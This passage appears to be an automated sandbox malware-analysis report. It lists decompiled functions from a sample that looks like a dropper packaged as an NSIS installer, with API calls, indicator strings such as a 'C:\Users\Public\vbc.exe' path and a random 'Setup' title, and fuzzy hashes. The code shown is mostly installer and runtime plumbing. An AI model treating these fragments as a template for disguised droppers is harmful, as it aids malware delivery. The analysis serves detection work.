					E10005297(__ebx, 1, __edi, _t92, __fp0);
					_v13 = 0;
				}
				while(_a4[0x18] != 0) {
					_a4[0x18] = _a4[0x18] - 0x10;
					_v8 = (_a4[0x14] >> _a4[0x18] & 0x0000ffff) << _v12 | _v8;
					_v12 = _v12 + 0x10;
				}
				while(1) {
					__eflags = _v12 - 0x20;
					_v14 = 0;
					if(_v12 < 0x20) {
						_t54 = _a4;
						_t76 = _a4;
						__eflags =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8));
						_t32 =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8)) < 0;
						__eflags = _t32;
						_v14 = _t82 & 0xffffff00 | _t32;
					}
					_t50 = _v14;
					__eflags = _t50 & 0x00000001;
					if((_t50 & 0x00000001) == 0) {
						break;
					}
					 *_t90 = _a4;
					_v20 = E10004030() & 0x0000ffff;
					_v8 = _v20 << _v12 | _v8;
					_t82 = _v12 + 0x10;
					_v12 = _t82;
				}
				return _v8;
			}
















                                                0x10004159
                                                0x10004160
                                                0x10004167
                                                0x10004170
                                                0x10004173
                                                0x10004175
                                                0x10004178
                                                0x10004184
                                                0x1000418d
                                                0x10004191
                                                0x10004199
                                                0x100041a0
                                                0x100041a0
                                                0x100041a6
                                                0x100041bc
                                                0x100041da
                                                0x100041e3
                                                0x100041e3
                                                0x100041f0
                                                0x100041f2
                                                0x100041f6
                                                0x100041f9
                                                0x100041ff
                                                0x10004208
                                                0x1000420b
                                                0x1000420e
                                                0x1000420e
                                                0x10004211
                                                0x10004211
                                                0x10004214
                                                0x10004217
                                                0x10004219
                                                0x00000000
                                                0x00000000
                                                0x10004227
                                                0x10004235
                                                0x10004242
                                                0x10004248
                                                0x1000424b
                                                0x1000424b
                                                0x1000425a

                                                APIs
                                                • __wassert.LIBCMT ref: 10004199
                                                  • Part of subcall function 10005297: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000535C
                                                  • Part of subcall function 10005297: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 10005388
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Module$FileHandleName__wassert
                                                • String ID: $(dec->bit_pos & 0xF) == 0$Source.c
                                                • API String ID: 1832359313-2493867184
                                                • Opcode ID: 5c08706582030b261e21bbc914382971aab491052d29c33789c90defc3be8190
                                                • Instruction ID: 51f6379824fe9e4415b07059da216bb01802ed9ed433fbb833ff1512406a754a
                                                • Opcode Fuzzy Hash: 5c08706582030b261e21bbc914382971aab491052d29c33789c90defc3be8190
                                                • Instruction Fuzzy Hash: 14312B74A04248EFDB04DF98C090A9DBFF1EF54380F25849DE8899B346D731EA85DB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                0x00401bd3
                                                0x00401bdf
                                                0x00401be2
                                                0x00401beb
                                                0x00401beb
                                                0x00401bee
                                                0x00401bf2
                                                0x00401bfb
                                                0x00401bfb
                                                0x00401bfe
                                                0x00401c02
                                                0x00401c04
                                                0x00401c51
                                                0x00401c53
                                                0x00401c5c
                                                0x00401c64
                                                0x00401c67
                                                0x00401c67
                                                0x00401c70
                                                0x00000000
                                                0x00401c06
                                                0x00401c0d
                                                0x00401c0f
                                                0x00401c17
                                                0x00401c1a
                                                0x00401c42
                                                0x00401c76
                                                0x00401c76
                                                0x00401c1c
                                                0x00401c2a
                                                0x00401c32
                                                0x00401c35
                                                0x00401c35
                                                0x00401c1a
                                                0x00401c79
                                                0x00401c7c
                                                0x00401c82
                                                0x00402866
                                                0x00402866
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                • SendMessageA.USER32 ref: 00401C42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004038B4, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f50; // 0x601fd8
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "kozkonzcvlkexzh Setup", 0xfffffffe));
						_t11 =  *0x423f6c; // 0x2
						_t27 =  *0x423f68; // 0x602184
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x60219c
								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                0x004038b8
                                                0x004038bd
                                                0x004038c3
                                                0x004038c8
                                                0x004038c8
                                                0x004038d0
                                                0x00000000
                                                0x00000000
                                                0x004038d2
                                                0x004038d8
                                                0x004038e0
                                                0x004038e2
                                                0x004038e8
                                                0x004038e8
                                                0x004038ea
                                                0x004038f6
                                                0x00000000
                                                0x00000000
                                                0x004038fa
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004038fc
                                                0x00403901
                                                0x0040390a
                                                0x00403910
                                                0x00403915
                                                0x00403929
                                                0x00403934
                                                0x0040394c
                                                0x00403952
                                                0x00403957
                                                0x0040395f
                                                0x00403980
                                                0x00403980
                                                0x00403980
                                                0x00403961
                                                0x00403963
                                                0x00403963
                                                0x00403967
                                                0x0040396a
                                                0x0040396e
                                                0x0040396e
                                                0x00403973
                                                0x00403979
                                                0x00403979
                                                0x00000000
                                                0x00403963
                                                0x00403917
                                                0x0040391c
                                                0x00403925
                                                0x0040391e
                                                0x0040391e
                                                0x0040391e
                                                0x0040391c

                                                APIs
                                                • SetWindowTextA.USER32(00000000,kozkonzcvlkexzh Setup), ref: 0040394C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: "C:\Users\Public\vbc.exe" $1033$kozkonzcvlkexzh Setup
                                                • API String ID: 530164218-1525549739
                                                • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10008671, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 16%
                                                			E10008671(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						return  *_t4(_a4);
					}
				}
				return _t4;
			}





                                                0x10008675
                                                0x10008680
                                                0x10008688
                                                0x10008692
                                                0x1000869a
                                                0x00000000
                                                0x1000869f
                                                0x1000869a
                                                0x100086a4

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,10003D2C,?,?,10008666,?,?,10009F8C,000000FF,0000001E,10019430,00000008,10009F2F,?,?), ref: 10008680
                                                • GetProcAddress.KERNEL32(10003D2C,CorExitProcess,?,?,10008666,?,?,10009F8C,000000FF,0000001E,10019430,00000008,10009F2F,?,?), ref: 10008692
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 1646373207-1276376045
                                                • Opcode ID: 99db58fcea7d838a768e0348fb6ebae947b0658cd6e5d5674898ffd9bc574825
                                                • Instruction ID: 88e7426cc6f18b6d54fdb2bec73e2c841fe4e9f9ca8465ac7c6cc65ddea0344f
                                                • Opcode Fuzzy Hash: 99db58fcea7d838a768e0348fb6ebae947b0658cd6e5d5674898ffd9bc574825
                                                • Instruction Fuzzy Hash: 62D01730600208BBEF41DBA1CC85FAA7BACEB05681F054165F909E5060DB32DB609B6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                0x0040568c
                                                0x004056a3
                                                0x004056ab
                                                0x004056ab
                                                0x004056b3

                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                • CharPrevA.USER32(?,00000000), ref: 0040569A
                                                • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1000E2CE, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E1000E2CE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000A920(_t50,  &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000E10D( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E1000983A(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

















                                                0x1000e2d6
                                                0x1000e2db
                                                0x1000e2f5
                                                0x00000000
                                                0x1000e2f5
                                                0x1000e2dd
                                                0x1000e2e2
                                                0x00000000
                                                0x00000000
                                                0x1000e2e7
                                                0x1000e304
                                                0x1000e309
                                                0x1000e30c
                                                0x1000e313
                                                0x1000e332
                                                0x1000e339
                                                0x1000e33b
                                                0x1000e37f
                                                0x1000e38e
                                                0x1000e39c
                                                0x1000e39e
                                                0x1000e3ae
                                                0x1000e3ae
                                                0x1000e3b2
                                                0x1000e3b4
                                                0x1000e3b7
                                                0x1000e3b7
                                                0x1000e3b7
                                                0x1000e3b7
                                                0x00000000
                                                0x1000e3bd
                                                0x1000e3a0
                                                0x1000e3a0
                                                0x1000e3a5
                                                0x1000e3a5
                                                0x1000e3a8
                                                0x00000000
                                                0x1000e3a8
                                                0x1000e33d
                                                0x1000e340
                                                0x1000e344
                                                0x1000e36d
                                                0x1000e36d
                                                0x1000e370
                                                0x1000e370
                                                0x00000000
                                                0x00000000
                                                0x1000e372
                                                0x1000e376
                                                0x00000000
                                                0x00000000
                                                0x1000e378
                                                0x1000e378
                                                0x00000000
                                                0x1000e378
                                                0x1000e346
                                                0x1000e349
                                                0x00000000
                                                0x00000000
                                                0x1000e34d
                                                0x1000e360
                                                0x1000e366
                                                0x1000e369
                                                0x1000e36b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x1000e36b
                                                0x1000e315
                                                0x1000e318
                                                0x1000e31a
                                                0x1000e31f
                                                0x1000e31f
                                                0x1000e324
                                                0x00000000
                                                0x1000e324
                                                0x1000e2e9
                                                0x1000e2ee
                                                0x1000e2f2
                                                0x1000e2f2
                                                0x00000000

                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E304
                                                • __isleadbyte_l.LIBCMT ref: 1000E332
                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E360
                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E396
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 367cece10c6e86003bd5d303d51d1efd0f3d537cbef9198eaf7821fe6c28f4f9
                                                • Instruction ID: e0bbd057c66a3de5298c5dea921b35d6831f26d77b03a8d21a7351de97c0f8a2
                                                • Opcode Fuzzy Hash: 367cece10c6e86003bd5d303d51d1efd0f3d537cbef9198eaf7821fe6c28f4f9
                                                • Instruction Fuzzy Hash: 3B31C231600296ABEB11CF75C848BAA7FF9FF413D0F158129E8A0A7194D730EE90DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001065B, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E1001065B(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E100109E4(_a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					if(_t25 != 0x66) {
						if(_t25 == 0x61 || _t25 == 0x41) {
							_t26 = E10010AB2(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							_t26 = E10010FBB(__edx, __esi, _a4, _a8, _a12, _a20, _a24, _a28);
						}
						L9:
						return _t26;
					} else {
						return E10010EFA(__edx, __esi, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                0x1001065e
                                                0x10010664
                                                0x100106d7
                                                0x00000000
                                                0x1001066b
                                                0x1001066e
                                                0x1001068c
                                                0x100106be
                                                0x10010693
                                                0x100106a5
                                                0x100106a5
                                                0x100106dc
                                                0x100106e0
                                                0x10010670
                                                0x10010688
                                                0x10010688
                                                0x1001066e

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                • String ID:
                                                • API String ID: 3016257755-0
                                                • Opcode ID: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                • Instruction ID: 89a450d459da5a3812fef2ea964860e177c4d078e22bdd91ed20284a6ca40805
                                                • Opcode Fuzzy Hash: fa8b6b89d1aa930843557c8cfc103ba220466895185e2f80efcd0b6765eb47da
                                                • Instruction Fuzzy Hash: A4014C7660018EBBCF12DE84CC028EE3F66FF48294B598415FEA859031D776D9B1AB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                0x00401d46
                                                0x00401d5f
                                                0x00401d69
                                                0x00401d6e
                                                0x00401d79
                                                0x00401d80
                                                0x00401d92
                                                0x00401d98
                                                0x00401d9d
                                                0x00401da7
                                                0x004024eb
                                                0x00401561
                                                0x00402866
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirect
                                                • String ID:
                                                • API String ID: 3272661963-0
                                                • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                                0x00402bf8
                                                0x00402c12
                                                0x00402c18
                                                0x00402c22
                                                0x00402c28
                                                0x00402c2e
                                                0x00402c3f
                                                0x00402c48
                                                0x00000000
                                                0x00402c4d
                                                0x00402c54
                                                0x00402c1a
                                                0x00402c21
                                                0x00402c21
                                                0x00402bfa
                                                0x00402bfa
                                                0x00402c01
                                                0x00402c04
                                                0x00402c04
                                                0x00402c0a
                                                0x00402c11
                                                0x00402c11

                                                APIs
                                                • DestroyWindow.USER32 ref: 00402C04
                                                • GetTickCount.KERNEL32(00000000,00402DD1,00000001), ref: 00402C22
                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
